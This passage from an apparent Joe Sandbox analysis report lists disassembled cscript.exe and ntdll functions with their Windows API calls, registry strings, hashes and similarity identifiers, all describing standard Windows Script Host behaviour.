                                                      • Instruction ID: 9d19a71a438df033ef4fdac8123d27dbdb6e56793caf98de32299cefe17075e0
                                                      • Opcode Fuzzy Hash: 4580a3c10d567fc5cf515cbfe8ba274833d21a2b8ae4f85e0f216a82063c4979
                                                      • Instruction Fuzzy Hash: D7410971100612EFDB109F58EC48BAEBB6BFF45361F148521F856D6260C7728911EFE1
                                                      Function 00626E50 Relevance: 16.6, APIs: 11, Instructions: 87COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(00000000), ref: 00626E75
                                                        • Part of subcall function 0062A9C0: InitializeCriticalSection.KERNEL32(00639498,00638AD8,000000A0,00626E82), ref: 0062A9E8
                                                        • Part of subcall function 0062A9C0: GetVersionExA.KERNEL32(00000094), ref: 0062AA06
                                                      • GetCommandLineW.KERNEL32 ref: 00626E97
                                                      • __alloca_probe_16.LIBCMT ref: 00626EC5
                                                      • wcscpy_s.MSVCRT ref: 00626ECF
                                                      • __alloca_probe_16.LIBCMT ref: 00626EE8
                                                      • ExitProcess.KERNEL32 ref: 00626F10
                                                      • ExitProcess.KERNEL32 ref: 0062EB76
                                                      • GetCommandLineA.KERNEL32 ref: 0062EB7C
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 0062EB8F
                                                      • __alloca_probe_16.LIBCMT ref: 0062EB9A
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000000), ref: 0062EBAA
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: __alloca_probe_16$ByteCharCommandExitLineMultiProcessWide$CriticalHandleInitializeModuleSectionVersionwcscpy_s
                                                      • String ID:
                                                      • API String ID: 1664898510-0
                                                      • Opcode ID: 642a1d785c0ed04520ff045f0072c317fcefdbc6b9a8363466028a6c103daed2
                                                      • Instruction ID: 001e4c505c1f8c1010eccaf8abe57727a47bb65993166086cc60047ebc388ed0
                                                      • Opcode Fuzzy Hash: 642a1d785c0ed04520ff045f0072c317fcefdbc6b9a8363466028a6c103daed2
                                                      • Instruction Fuzzy Hash: F7212931204A20ABD7242B75ED09B6B3A9BAF89714F24012CF546872D5DE715C018FE5
                                                      Function 00629F10 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 216memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 0062DBC0: malloc.MSVCRT ref: 0062DBD8
                                                      • SafeArrayCreate.OLEAUT32(0000000C,00000001,?), ref: 00629F89
                                                      • SafeArrayCreate.OLEAUT32(0000000C,00000001,?), ref: 00629FA2
                                                      • SysAllocStringLen.OLEAUT32(?,00000000), ref: 0062A065
                                                      • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 0062A081
                                                      • VariantClear.OLEAUT32(?), ref: 0062A08E
                                                      • SysAllocString.OLEAUT32(?), ref: 0062A0B7
                                                      • SafeArrayPutElement.OLEAUT32(?,?,?), ref: 0062A0D3
                                                      • VariantClear.OLEAUT32(?), ref: 0062A0E0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: ArraySafe$AllocClearCreateElementStringVariant$malloc
                                                      • String ID: -
                                                      • API String ID: 2320673430-2547889144
                                                      • Opcode ID: 6c05bade719826bde34081d9fde7bfcdd60307b2f7dc31cfe18f2c7046c97d7a
                                                      • Instruction ID: 36ddb3c7d051632761e4bfcbb7dc0dbadd941c9757291628493c10a354ca39fc
                                                      • Opcode Fuzzy Hash: 6c05bade719826bde34081d9fde7bfcdd60307b2f7dc31cfe18f2c7046c97d7a
                                                      • Instruction Fuzzy Hash: FC815971E006199BDB14CFE8E8946EEBBB6FF48304F24802AE501E7390D7759A45CFA5
                                                      Function 006278F0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 165registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegQueryValueExW.ADVAPI32(00000001,Enabled,00000000,?,?,?,00000000,00000001,Enabled), ref: 00627945
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,Enabled,000000FF,00000000,00000000,00000000,00000000,00000000,00000001,Enabled), ref: 0062FD6B
                                                      • __alloca_probe_16.LIBCMT ref: 0062FD7B
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,Enabled,000000FF,?,?,00000000,00000000), ref: 0062FD9A
                                                      • RegQueryValueExA.ADVAPI32(00000001,00000000,00000000,?,?,?,00000000,00000001,Enabled), ref: 0062FDDE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiQueryValueWide$__alloca_probe_16
                                                      • String ID: Enabled$false
                                                      • API String ID: 1757841119-109718029
                                                      • Opcode ID: 5bbc700024036634bb4ee6979add5e4508482947f67282b38e34974850cc1bdd
                                                      • Instruction ID: 920ae19229a271a67b83904d46439d3efe476015b3d8082aea333fc693f17a6f
                                                      • Opcode Fuzzy Hash: 5bbc700024036634bb4ee6979add5e4508482947f67282b38e34974850cc1bdd
                                                      • Instruction Fuzzy Hash: 7151EA70904639ABEB348B24EC41FEA777A9F05320F2007A5E655E62D1DF309EC5CE65
                                                      Function 006328AC Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 115registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegOpenKeyExA.ADVAPI32(80000000,0000002E,00000000,00020019,?), ref: 0063292F
                                                      • RegQueryValueExA.ADVAPI32(?,00623EFE,00000000,00000000,?,00000104), ref: 00632964
                                                      • RegCloseKey.ADVAPI32(?), ref: 00632972
                                                      • RegEnumKeyExA.ADVAPI32(80000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 006329D2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: CloseEnumOpenQueryValue
                                                      • String ID: .$Open$Open2$WSFFile$WSHFile
                                                      • API String ID: 3984146545-2336295846
                                                      • Opcode ID: 99b778588df7c18b7df1267ce8e7534bdd0a9ef8722da346fa021482abe6b058
                                                      • Instruction ID: 7d0b017b0b3a57a20c403f80bbfac73e96f92ab69553dcaa50530e686958b09a
                                                      • Opcode Fuzzy Hash: 99b778588df7c18b7df1267ce8e7534bdd0a9ef8722da346fa021482abe6b058
                                                      • Instruction Fuzzy Hash: DD31FAB1A0012B6BE7209B51DC59BFB76AEEB20704F2000A9E545D6180D7B49E848FA1
                                                      Function 0062B910 Relevance: 15.1, APIs: 10, Instructions: 96COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 0062A6F5: LoadStringW.USER32(?,?,00000800,00000C89), ref: 0062A737
                                                        • Part of subcall function 0062A6F5: SysAllocString.OLEAUT32(?), ref: 0062A74A
                                                      • GetStdHandle.KERNEL32(000000F5,?,?), ref: 0062B978
                                                        • Part of subcall function 0062B9F0: GetProcessHeap.KERNEL32(00000000,?,00000000,00000000,?), ref: 0062BAA7
                                                        • Part of subcall function 0062B9F0: HeapAlloc.KERNEL32(00000000), ref: 0062BAAE
                                                      • SysFreeString.OLEAUT32(?), ref: 0062B98A
                                                      • SysFreeString.OLEAUT32(00000000), ref: 0062B991
                                                      • SysFreeString.OLEAUT32(00000000), ref: 0062B998
                                                        • Part of subcall function 0062BCDF: FormatMessageW.KERNEL32(00000500,?,00000000,00000000,?,00000000,?,00000000,?,00000000,0062B95E,?), ref: 0062BD1E
                                                        • Part of subcall function 0062BCDF: SysAllocString.OLEAUT32(?), ref: 0062BD2F
                                                        • Part of subcall function 0062BCDF: LocalFree.KERNEL32(00000000,?,00000000,0062B95E,?), ref: 0062BD51
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: String$Free$Alloc$Heap$FormatHandleLoadLocalMessageProcess
                                                      • String ID:
                                                      • API String ID: 1815185728-0
                                                      • Opcode ID: 797b88dacf07a0eb92d7a5e4f1882df1a3322384616039bd317b9d4c92ec7ca5
                                                      • Instruction ID: d575898ca89cc3a603303599b57a080515ddd920265f5b612275c8e5fbcb128c
                                                      • Opcode Fuzzy Hash: 797b88dacf07a0eb92d7a5e4f1882df1a3322384616039bd317b9d4c92ec7ca5
                                                      • Instruction Fuzzy Hash: 4C315C71E00219AFCB10DFA5DC888AFBBBAFF49354B145169E901A7211DB319A41DFA1
                                                      Function 04BC7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04C04655
                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04C046FC
                                                      • ExecuteOptions, xrefs: 04C046A0
                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04C04725
                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 04C04787
                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04C04742
                                                      • Execute=1, xrefs: 04C04713
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3820853738.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                      • Associated: 00000005.00000002.3820853738.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3820853738.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3820853738.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_4b60000_cscript.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                      • API String ID: 0-484625025
                                                      • Opcode ID: 0c64a6a8cbd2cf87952dc05453b728b6a46c67871c4f24722777b2106ebd52a9
                                                      • Instruction ID: a00962b534e47bf14bdf1a2f9337bc7ec2f7b58ef91a66ce4d47c0963416acd6
                                                      • Opcode Fuzzy Hash: 0c64a6a8cbd2cf87952dc05453b728b6a46c67871c4f24722777b2106ebd52a9
                                                      • Instruction Fuzzy Hash: 3E51D63164021A6BEB14ABA8DC89BAA77A9EB05304F1400EDE505A7290EB70BE459F64
                                                      Function 0063484C Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 132libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetProcAddress.KERNEL32(?,WinVerifyTrust), ref: 00634930
                                                      • GetLastError.KERNEL32 ref: 0063493C
                                                      • GetLastError.KERNEL32 ref: 00634990
                                                      • FreeLibrary.KERNEL32(?,00000000,?,00000000), ref: 006349AE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$AddressFreeLibraryProc
                                                      • String ID: ($4$WinVerifyTrust$wintrust.dll
                                                      • API String ID: 1171437518-2532474036
                                                      • Opcode ID: ebec34a26f7b446f24f724db96fbbd65ef0a8479f2f1ce5ca56064b13b37769a
                                                      • Instruction ID: 9e96b7b0b98e9d3fe2cf2009a05dbe1059bf783cf35861771e171ca56ef40b81
                                                      • Opcode Fuzzy Hash: ebec34a26f7b446f24f724db96fbbd65ef0a8479f2f1ce5ca56064b13b37769a
                                                      • Instruction Fuzzy Hash: D94109B6D017298BCB10CF99988069EFBB6BF44710F11422ED915BB380DB74A9058FD1
                                                      Function 0062B1D0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 84libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(WLDP.DLL,00000000,00000800,?,00000000,?,00627DA1,?,?,?,?,?,?,?), ref: 0062B1E9
                                                      • GetProcAddress.KERNEL32(00000000,WldpGetLockdownPolicy), ref: 0062B1FF
                                                      • GetProcAddress.KERNEL32(00000000,WldpIsClassInApprovedList), ref: 0062B216
                                                      • FreeLibrary.KERNEL32(00000000,?,?,?), ref: 0062B2B6
                                                      • GetLastError.KERNEL32(?,?,?), ref: 0063124B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryProc$ErrorFreeLastLoad
                                                      • String ID: WLDP.DLL$WldpGetLockdownPolicy$WldpIsClassInApprovedList
                                                      • API String ID: 1004692917-3104440107
                                                      • Opcode ID: d1b8a607a157d37d95983e2ee1802af1b7a66fb84153eb153e4d31ce8459f526
                                                      • Instruction ID: c99fad50b3e6d19a01766403ab00a7f5efa8468db8d63b6a413b0e2cbb202f0d
                                                      • Opcode Fuzzy Hash: d1b8a607a157d37d95983e2ee1802af1b7a66fb84153eb153e4d31ce8459f526
                                                      • Instruction Fuzzy Hash: 2421A271901B26DBC7118F9498887BEBBB6EB44710F258029ED19EB350DB34DA809FD1
                                                      Function 00633160 Relevance: 13.8, APIs: 9, Instructions: 335COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 0062C93B: memcmp.MSVCRT ref: 0062C93F
                                                      • VariantClear.OLEAUT32(?), ref: 00633469
                                                      • SysFreeString.OLEAUT32(00000000), ref: 0063349B
                                                      • SysFreeString.OLEAUT32(?), ref: 006334A9
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: FreeString$ClearVariantmemcmp
                                                      • String ID:
                                                      • API String ID: 1922676145-0
                                                      • Opcode ID: f4a029d92ddbfccd64787d6ae3e95596413246a280a72de752a248d083ef974c
                                                      • Instruction ID: a6cd720c1349ac99a71ddaa2506051056bd079a8e6f5b3a4e9235a9d692fa351
                                                      • Opcode Fuzzy Hash: f4a029d92ddbfccd64787d6ae3e95596413246a280a72de752a248d083ef974c
                                                      • Instruction Fuzzy Hash: BBC17F75E00229AFCF14CF98D885AAEBBB6FF48310F158169E905AB351D7319E42DBD0
                                                      Function 00628156 Relevance: 13.6, APIs: 9, Instructions: 103COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetFullPathNameW.KERNEL32(0062ECAE,00000104,?,?,?,?,?,?,?,?), ref: 00628188
                                                      • GetLastError.KERNEL32 ref: 006304DC
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0062ECAE,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,?,?), ref: 00630503
                                                      • __alloca_probe_16.LIBCMT ref: 0063050F
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: ByteCharErrorFullLastMultiNamePathWide__alloca_probe_16
                                                      • String ID:
                                                      • API String ID: 187176378-0
                                                      • Opcode ID: b687e1b374f929a9ced613b285500b4fa60ee262f7cdca833cf06a7b28b65009
                                                      • Instruction ID: f4bedcaa9eac758cd7402190a3dbbbb4e3fd3c878eb0cf16474ab1bbe49c20a0
                                                      • Opcode Fuzzy Hash: b687e1b374f929a9ced613b285500b4fa60ee262f7cdca833cf06a7b28b65009
                                                      • Instruction Fuzzy Hash: 7031C571601166BF9B205FA69C4CEEB7FBEEF86364F108114F915A6292CA308D05DAF1
                                                      Function 0062C7F0 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 259COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SysFreeString.OLEAUT32(?), ref: 0062C850
                                                      • SysFreeString.OLEAUT32(?), ref: 0062C859
                                                      • SysFreeString.OLEAUT32(?), ref: 0062C862
                                                      • SysFreeString.OLEAUT32(?), ref: 0062C86B
                                                      • SysFreeString.OLEAUT32(?), ref: 0062C874
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: FreeString
                                                      • String ID: P?b$WScript_OnScriptTerminate
                                                      • API String ID: 3341692771-1339196017
                                                      • Opcode ID: 0c8dc19ba0b56a7033d7bd6fc10b4fe59a8e614170a82e3998a76dac1bc8203b
                                                      • Instruction ID: 1b07ba4fc34e9c57c24558016020492534bf9074eb271a138b0181e0cce36cda
                                                      • Opcode Fuzzy Hash: 0c8dc19ba0b56a7033d7bd6fc10b4fe59a8e614170a82e3998a76dac1bc8203b
                                                      • Instruction Fuzzy Hash: 16918D71A00215AFCB18CF99E894AAEBBB7FF49314F10416DE506AB390DB34AD41CB95
                                                      Function 0063748C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 80registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegCreateKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows Script Host\Settings,00000000,00000000,00000000,?,00000000,0062F129,00000000,?,?,?,80000001,80000001,?,00632623), ref: 006374BE
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,Software\Microsoft\Windows Script Host\Settings,000000FF,00000000,00000000,00000000,00000000,?,?,?,80000001,80000001,?,00632623,00020006), ref: 006374E0
                                                      • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,00632623,00020006,?,?,?,?,0062F129), ref: 006374EC
                                                      • __alloca_probe_16.LIBCMT ref: 006374F6
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,Software\Microsoft\Windows Script Host\Settings,000000FF,?,00000000,00000000,00000000,?,00632623,00020006,?,?,?,?,0062F129), ref: 0063750D
                                                      • RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,?,00000000,0062F129,00000000,?,00000000,00000000,00000000,?,00632623,00020006), ref: 00637526
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: ByteCharCreateMultiWide$ErrorLast__alloca_probe_16
                                                      • String ID: Software\Microsoft\Windows Script Host\Settings
                                                      • API String ID: 3071801306-2126348837
                                                      • Opcode ID: 5515cc32698779cebb9f526cf07525242d3e59a485666e285463540b7d2a7b5d
                                                      • Instruction ID: 558ce394f9e8c53d1a08de6b509fed5f547db960c30ed3f348f9c9764954c0c5
                                                      • Opcode Fuzzy Hash: 5515cc32698779cebb9f526cf07525242d3e59a485666e285463540b7d2a7b5d
                                                      • Instruction Fuzzy Hash: 5511D071206134BB8B305BA7AC4DEEB3EAFEF0A3B5F104114B409D5291DA74D900EAF1
                                                      Function 0063784A Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 78registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegSetValueExW.ADVAPI32(?,Timeout,00000000,00000004,?,00000004,?,?,?,0062F129), ref: 0063787B
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,Timeout,000000FF,00000000,00000000,00000000,00000000,?,?,?,0062F129), ref: 00637892
                                                      • GetLastError.KERNEL32(?,?,00000000,00000000), ref: 0063789F
                                                      • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000004,?,00000004,?,?,?,0062F129), ref: 006378D1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: Value$ByteCharErrorLastMultiWide
                                                      • String ID: Timeout
                                                      • API String ID: 1054387349-1325157390
                                                      • Opcode ID: 95e864aaa7e2710a2824fc9c3ca053d36b7dcc59c6275ebcbf4909a7242843fe
                                                      • Instruction ID: 13a3e00c9372804c327891918fb0b2d53ba893f9c9ca7616707c60706ada5afe
                                                      • Opcode Fuzzy Hash: 95e864aaa7e2710a2824fc9c3ca053d36b7dcc59c6275ebcbf4909a7242843fe
                                                      • Instruction Fuzzy Hash: FE11AFB0A04224BAD7209BA69C4DFEB7F7EDF4A7A4F100128B615D62D0DA708900DBF5
                                                      Function 00636DDC Relevance: 12.1, APIs: 8, Instructions: 57memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • malloc.MSVCRT ref: 00636DE4
                                                      • SysStringLen.OLEAUT32(?), ref: 00636E07
                                                      • SysAllocString.OLEAUT32(?), ref: 00636E15
                                                      • SysStringLen.OLEAUT32(?), ref: 00636E25
                                                      • SysAllocString.OLEAUT32(?), ref: 00636E32
                                                      • SysFreeString.OLEAUT32(?), ref: 00636E48
                                                      • SysFreeString.OLEAUT32(?), ref: 00636E57
                                                      • free.MSVCRT(00000000,?,006364F1,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00636E5E
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: String$AllocFree$freemalloc
                                                      • String ID:
                                                      • API String ID: 945414394-0
                                                      • Opcode ID: cfdc6d86edb52bfefe442bde305a238bd0960c525573b5c9cafc8f4fae714637
                                                      • Instruction ID: 555311ac93d06dddbf9f40ced746b74472e62e510fdb1eb044cbb717291f453b
                                                      • Opcode Fuzzy Hash: cfdc6d86edb52bfefe442bde305a238bd0960c525573b5c9cafc8f4fae714637
                                                      • Instruction Fuzzy Hash: DB118C35204706AFCB219F65EC08A877BE7EF00350F10C428F85582260DB71D854DB91
                                                      Function 00636D47 Relevance: 12.1, APIs: 8, Instructions: 56memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • malloc.MSVCRT ref: 00636D4F
                                                      • SysStringLen.OLEAUT32(?), ref: 00636D68
                                                      • SysAllocString.OLEAUT32(?), ref: 00636D76
                                                      • SysStringLen.OLEAUT32(?), ref: 00636D86
                                                      • SysAllocString.OLEAUT32(?), ref: 00636D93
                                                      • SysFreeString.OLEAUT32(?), ref: 00636DA9
                                                      • SysFreeString.OLEAUT32(?), ref: 00636DB8
                                                      • free.MSVCRT(00000000,?,00636491,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00636DBF
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: String$AllocFree$freemalloc
                                                      • String ID:
                                                      • API String ID: 945414394-0
                                                      • Opcode ID: 59c494485c87279ae45ccebaa72fe1aff4aaf255faa1426caeac3e862f434b5f
                                                      • Instruction ID: 8e10020601ba1e8514570415327468b7c864df93c423dea0d96ca9bee609a6c7
                                                      • Opcode Fuzzy Hash: 59c494485c87279ae45ccebaa72fe1aff4aaf255faa1426caeac3e862f434b5f
                                                      • Instruction Fuzzy Hash: F9117C31600716AFCB219F65EC08A9B7BE7EF00760F14C529F89AC66A0DB31D850EBD1
                                                      Function 00634D30 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 233COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SysFreeString.OLEAUT32(?), ref: 00634F81
                                                      • SysFreeString.OLEAUT32(?), ref: 00634F8A
                                                      • SysFreeString.OLEAUT32(?), ref: 00634F93
                                                      • SysFreeString.OLEAUT32(?), ref: 00634F9C
                                                      • SysFreeString.OLEAUT32(?), ref: 00634FA5
                                                      Strings
                                                      • WScript_OnScriptTerminate, xrefs: 00634EE1
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: FreeString
                                                      • String ID: WScript_OnScriptTerminate
                                                      • API String ID: 3341692771-526745235
                                                      • Opcode ID: 28a55a2a868b6db2428f3e6c59af3823f1d90064f209b387dee5d415e97f07a3
                                                      • Instruction ID: 92489c246a6f56262500c79b0d5c90f37a2d2c9fd59664c40c9401c658027211
                                                      • Opcode Fuzzy Hash: 28a55a2a868b6db2428f3e6c59af3823f1d90064f209b387dee5d415e97f07a3
                                                      • Instruction Fuzzy Hash: E7814A71A002169FCB18DF94D885AAEBBB6FF88314F14016DE512A73A0DF34BD41CB95
                                                      Function 0062B100 Relevance: 10.6, APIs: 7, Instructions: 87stringlibraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetSystemDirectoryA.KERNEL32(?,00000000), ref: 0062B120
                                                      • GetSystemDirectoryA.KERNEL32(00000000,00000001), ref: 0062B158
                                                      • strcpy_s.MSVCRT ref: 0062B172
                                                      • strcpy_s.MSVCRT ref: 0062B183
                                                      • LoadLibraryExA.KERNEL32(00000000,00000000,00000800), ref: 0062B194
                                                      • GetLastError.KERNEL32 ref: 00631212
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: DirectorySystemstrcpy_s$ErrorLastLibraryLoad
                                                      • String ID:
                                                      • API String ID: 3723718217-0
                                                      • Opcode ID: e65554dbc831ec1bc58e79afaceb6e5d5e4b54386157aa627789bf453cd0d7a2
                                                      • Instruction ID: b404b3ce3c6277119cf66925e6d75b689e96ff0d6e282f993f9755a98bdc7551
                                                      • Opcode Fuzzy Hash: e65554dbc831ec1bc58e79afaceb6e5d5e4b54386157aa627789bf453cd0d7a2
                                                      • Instruction Fuzzy Hash: EB213872A046269BC3119FA4AC58BAB77EAEF44300F180069F845DB300EB35D9449BE1
                                                      Function 00637EE3 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 59registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383},00000000,00000001,?,?), ref: 00637F1B
                                                      • RegQueryValueExW.ADVAPI32(?,Locale,00000000,00000000,00638772,00000006,00000000), ref: 00637F38
                                                      • RegCloseKey.ADVAPI32(?), ref: 00637F43
                                                      • _wcsnicmp.MSVCRT ref: 00637F5B
                                                      Strings
                                                      • Locale, xrefs: 00637F30
                                                      • Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}, xrefs: 00637F11
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: CloseOpenQueryValue_wcsnicmp
                                                      • String ID: Locale$Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
                                                      • API String ID: 2262609651-1161606707
                                                      • Opcode ID: 3bb8cfaf2d454a49458f9bac0bb0ae1af6d31fd9402ff0b9c601867da5f63d90
                                                      • Instruction ID: 2ea5f4b7f7cf65713e0ff86c77c756840ae80189fffb47d25b7aea6f7a3054df
                                                      • Opcode Fuzzy Hash: 3bb8cfaf2d454a49458f9bac0bb0ae1af6d31fd9402ff0b9c601867da5f63d90
